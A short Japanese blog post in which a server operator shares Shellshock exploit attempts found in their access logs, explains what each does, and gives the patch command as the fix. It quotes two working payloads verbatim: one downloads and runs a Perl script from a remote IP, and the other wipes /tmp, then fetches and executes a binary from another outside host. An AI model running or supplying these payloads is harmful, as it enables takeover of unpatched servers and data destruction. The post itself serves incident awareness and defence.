運用しているサーバのアクセスログを確認してみたところ、ほげー
攻撃されている・・・!? (°Д°!
内容見る限り、Shell Shock (シェルショック)でしょう。
あ、全然違う、こっちです。
攻撃まとめ
- perlが使えることを確認したら、(たぶん)的当に用意したサーバに悪用のスクリプトを配置して、それを攻撃するサーバのwgetコマンドを使用して読み込ませて、実行する。その後、痕跡を隠すため、スクリプトファイル削除
"() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://202.191.121.230/ou.pl -O /tmp/b.pl;curl -O /tmp/b.pl http://202.191.121.230/ou.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'
- これは多すぎて読む気無くす・・・・「China」って、おいおい(わざとかな?)
() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-bsec >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-bsec >> /tmp/Run.sh;echo /tmp/China.Z-bsec >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-bsec >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-bsec >> /tmp/Run.sh;echo /tmp/China.Z-bsec >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"
(すぐできる)対応策
パッチはすでにでていますので、下記を実行してあげれば問題ないかと
$ yum update bash